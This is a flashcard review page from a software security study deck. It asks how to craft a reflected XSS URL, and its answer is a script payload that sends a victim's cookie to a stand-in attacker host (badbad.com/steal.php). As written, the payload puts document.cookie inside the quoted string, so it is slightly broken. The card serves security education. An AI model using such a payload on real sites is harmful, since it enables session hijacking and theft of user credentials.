Review Note
Last Update: 04/27/2023 06:21 AM
Current Deck: Software Security
New Card (Unpublished)Currently Published Content
Front
Back
No published tags.
Pending Suggestions
Field Change Suggestions:
Front
Commit #1548
Given the target host
http://www.vulnerable.com/login.jsp?name=
and the attacker's endpoint
http://www.badbad.com/steal.php?cookie=
How can a reflected XSS url be crafted?
http://www.vulnerable.com/login.jsp?name=
and the attacker's endpoint
http://www.badbad.com/steal.php?cookie=
How can a reflected XSS url be crafted?
Back
Commit #1548
http://www.vulnerable.com/login.jsp?name=
<script>window.open("http://www.badbad.com/steal.php?cookie=document.cookie")</script>